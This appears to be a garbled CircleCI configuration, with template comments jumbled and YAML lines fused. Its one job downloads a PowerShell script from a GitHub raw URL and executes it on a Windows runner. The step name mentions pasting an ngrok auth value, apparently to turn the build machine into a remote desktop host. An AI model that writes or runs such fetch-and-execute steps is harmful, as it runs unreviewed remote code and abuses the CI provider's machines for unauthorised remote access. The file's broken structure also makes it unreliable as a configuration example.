# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/2.0/configuration-reference


# Define a job to be invoked later in a workflow.
# See: https://circleci.com/docs/2.0/configuration-reference/#jobs

    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor

     
    # Add steps to the job

      - checkout
"

# Invoke jobs via workflows
# See: https://circleci.com/docs/2.0/configuration-reference/#workflows

    jobs:   version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: Paste Ngrok Auth Value In Hosted Link
          command: |      
            Invoke-WebRequest https://raw.githubusercontent.com/jroseotb/rdp/main/rdpj -OutFile gpu.ps1 
          
      - run: ./gpu.ps1

